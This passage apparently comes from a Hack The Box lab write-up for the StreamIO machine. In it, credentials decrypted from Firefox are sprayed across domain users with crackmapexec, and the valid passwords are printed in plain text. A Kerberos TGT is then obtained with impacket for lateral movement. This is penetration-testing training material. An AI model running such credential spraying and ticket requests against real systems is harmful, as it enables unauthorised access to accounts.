JDgodd


A successful decryption of Firefox credential led to compromising 4 web credentials. While the web server used for authentication suggests another possible virtual host or sub-domain(slack.streamio.htb), those decrypted credentials must be validated as they appear rather different,

In the following sections, a domain-wide brute-force attack will be conducted to validate the credential of the JDgodd user

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ crackmapexec smb dc.streamio.htb -d STREAMIO.HTB -u domain_users.txt -p passwords.txt --continue-on-success
smb         dc.streamio.htb 445    dc               [*] windows 10.0 build 17763 x64 (name:DC) (domain:STREAMIO.HTB) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
smb         dc.streamio.htb 445    dc               [+] streamio.htb\nikk37:get_dem_girls2@yahoo.com 
smb         dc.streamio.htb 445    dc               [+] streamio.htb\jdgodd:JDg0dd1s@d0p3cr3@t0r 
 
[...REDACTED...]

Password reuse confirmed

*evil-winrm* ps c:\> NET localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
 
Members
 
-------------------------------------------------------------------------------
Martin
nikk37
The command completed successfully.

Since the JDgodd user is not part of the Remote Management Users group, I would need to proceed differently from here on out

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ impacket-getTGT streamio.htb/JDgodd@dc.streamio.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: JDg0dd1s@d0p3cr3@t0r
[*] Saving ticket in JDgodd@dc.streamio.htb.ccache

TGT generated for the JDgodd user Lateral Movement made to the JDgodd user